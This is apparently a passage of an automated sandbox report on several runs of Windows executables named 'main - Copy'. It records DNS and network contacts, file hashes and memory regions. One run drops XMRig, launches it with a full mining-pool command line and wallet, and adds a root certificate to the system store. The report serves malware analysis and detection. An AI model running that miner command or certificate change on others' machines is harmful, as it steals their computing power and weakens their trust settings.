US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/32-16-0x00000213BFE00000-0x00000213BFE20000-memory.dmp

memory/32-17-0x00000213C00E0000-0x00000213C0100000-memory.dmp

memory/32-18-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-19-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-21-0x00000213C1840000-0x00000213C1860000-memory.dmp

memory/32-20-0x00000213C0100000-0x00000213C0120000-memory.dmp

memory/32-22-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-23-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-24-0x00000213C0100000-0x00000213C0120000-memory.dmp

memory/32-25-0x00000213C1840000-0x00000213C1860000-memory.dmp

memory/32-26-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-27-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-28-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-29-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-30-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-31-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-32-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-33-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-34-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-35-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-36-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-37-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-38-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-39-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-40-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-41-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-42-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-43-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-44-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-45-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-46-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-47-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-48-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-49-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-50-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-51-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-52-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-53-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-54-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-55-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-56-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-57-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-58-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-59-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-60-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-61-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-62-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-63-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-64-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-65-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-66-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-67-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-68-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-69-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-70-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-71-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-72-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-73-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-74-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-75-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-76-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-77-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-78-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-79-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-80-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-81-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-82-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-83-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

memory/32-84-0x00007FF61BC30000-0x00007FF61C733000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:39

Platform

win10v2004-20240508-en

Max time kernel

1695s

Max time network

1708s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1593s

Max time network

1606s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:37

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 131.253.33.237:443 g.bing.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/5008-14-0x0000012B7B630000-0x0000012B7B650000-memory.dmp

memory/5008-15-0x0000012B7D040000-0x0000012B7D060000-memory.dmp

memory/5008-16-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-17-0x0000012C0FA20000-0x0000012C0FA40000-memory.dmp

memory/5008-18-0x0000012B7D060000-0x0000012B7D080000-memory.dmp

memory/5008-19-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-20-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-21-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-23-0x0000012B7D060000-0x0000012B7D080000-memory.dmp

memory/5008-22-0x0000012C0FA20000-0x0000012C0FA40000-memory.dmp

memory/5008-24-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-25-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-26-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-27-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-28-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-29-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-30-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-31-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-32-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-33-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-34-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-35-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-36-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-37-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-38-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-39-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-40-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-41-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-42-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-43-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-44-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-45-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-46-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-47-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-48-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-49-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-50-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-51-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-52-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-53-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-54-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-55-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-56-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-57-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-58-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-59-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-60-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-61-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-62-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-63-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-64-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-65-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-66-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-67-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-68-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-69-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-70-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-71-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-72-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-73-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-74-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-75-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-76-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-77-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-78-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-79-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-80-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-81-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp

memory/5008-82-0x00007FF6E9C00000-0x00007FF6EA703000-memory.dmp